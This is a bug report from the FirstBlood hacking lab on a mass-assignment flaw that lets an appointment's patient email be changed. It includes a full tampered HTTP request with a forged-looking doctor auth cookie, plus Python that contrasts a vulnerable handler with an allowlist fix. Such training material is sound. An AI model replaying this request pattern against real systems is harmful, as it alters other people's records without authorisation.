FirstBlood-#877 — It is possible to modify the email address of an appointment.
This issue was discovered on FirstBlood v2
On 2021-10-29, vigilante Level 4 reported:
It is possible to modify the email address of an appointment. The same vulnerability was present in V1 of First Blood.
When modifying an appointment the application tells us that "For safeguarding reasons you are only able to modify certain information about your appointment." The "patient email" field is greyed out and we're unable to modify it through the webpage. However, if we capture the POST request that modifies the appointment message, we are able to modify the email field as well.
Steps to Reproduce:
- Create an appointment with email "ff".
- Log in to a doctor's account so that we have a "doctorAuthed" cookie for step 5.
- Go to modify that appointment, /manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
- Click on "modify event" and capture the request with Burp
- Replay the request and add "&email=changedemail"
POST /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41 HTTP/1.1
Host: ca20e7622a6e-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b0b1f17cbc0fdc9a9ce23dfdf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Site-Req: permitted
Csrf: 99215d4e-0ff3-4275
Content-Length: 71
Origin: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com
Referer: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

message=test&id=2dbd91e1-b700-455e-a846-322be1985c41&email=changedemail
- After sending this, the patient's email address will change to "changedemail".
If someone got a hold of our appointment id and they added the "doctorAuthed" cookie, they'd be able to change the email address to their own email address.
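The steps above are a textbook hidden-parameter (mass-assignment) case: the UI greys out the email field, but the server writes whatever fields arrive in the form body. The following Python is an added example, not code from the report or from the FirstBlood application. It reconstructs the tampering step (appending email=changedemail to the captured body) and contrasts a hypothetical handler with the behaviour the report describes against a hardened one that uses a server-side allowlist. The appointment store, the field names other than "email", "message" and "id", the MODIFIABLE_FIELDS set and all function names are assumptions made for the illustration.

```python
from copy import deepcopy
from urllib.parse import parse_qs, urlencode

# Constructed sample data: one appointment created with the email "ff",
# as in step 1 of the report. The aptid is the one shown in the report.
APT_ID = "2dbd91e1-b700-455e-a846-322be1985c41"
SAMPLE_DB = {
    APT_ID: {"email": "ff", "message": "original message", "name": "patient"},
}

# The form body the "modify event" button sends (step 4), before tampering.
CAPTURED_BODY = f"message=test&id={APT_ID}"


def _parse(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def replay_body(body: str, **extra: str) -> str:
    """Step 5 of the report: re-encode the captured body with fields the UI
    never exposed appended to it (e.g. email=changedemail)."""
    params = _parse(body)
    params.update(extra)
    return urlencode(params)


def modify_appointment_vulnerable(db: dict, body: str) -> dict:
    """Hypothetical handler with the behaviour the report describes: every
    submitted field that matches a stored column is written, so a greyed-out
    field in the browser gives no protection at all."""
    params = _parse(body)
    apt = db[params["id"]]
    for field, value in params.items():
        if field != "id" and field in apt:
            apt[field] = value
    return apt


# Server-side allowlist: the only field the page says may be modified.
MODIFIABLE_FIELDS = frozenset({"message"})


def modify_appointment_fixed(db: dict, body: str) -> tuple:
    """Hardened handler: only allowlisted fields are written, and any other
    submitted field is reported back so it can be logged or rejected."""
    params = _parse(body)
    apt = db[params["id"]]
    rejected = sorted(f for f in params if f != "id" and f not in MODIFIABLE_FIELDS)
    for field in MODIFIABLE_FIELDS:
        if field in params:
            apt[field] = params[field]
    return apt, rejected


def demo() -> tuple:
    """Run the tampered request through both handlers on fresh copies of the
    constructed store and return (email after vulnerable handler,
    email after fixed handler, fields the fixed handler rejected)."""
    tampered = replay_body(CAPTURED_BODY, email="changedemail")
    vuln_db, fixed_db = deepcopy(SAMPLE_DB), deepcopy(SAMPLE_DB)
    vuln_apt = modify_appointment_vulnerable(vuln_db, tampered)
    fixed_apt, rejected = modify_appointment_fixed(fixed_db, tampered)
    return vuln_apt["email"], fixed_apt["email"], rejected


if __name__ == "__main__":
    print(demo())  # ('changedemail', 'ff', ['email'])
```

The allowlist is the fix the UI message implies but the server never enforced; note that it is independent of the doctorAuthed check, which decides who may edit, not which fields they may edit. Both checks are needed, because the report shows the cookie alone is enough once the aptid is known.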
FirstBlood ID: 33
Vulnerability Type: Application/Business Logic
Our mistake: We did not intentionally leave the code to change emails if the correct values were set; however, it created interesting results, because most discovered this but missed bug ID 21, and whilst it was not possible to modify via integer, if the ID was known it would still work.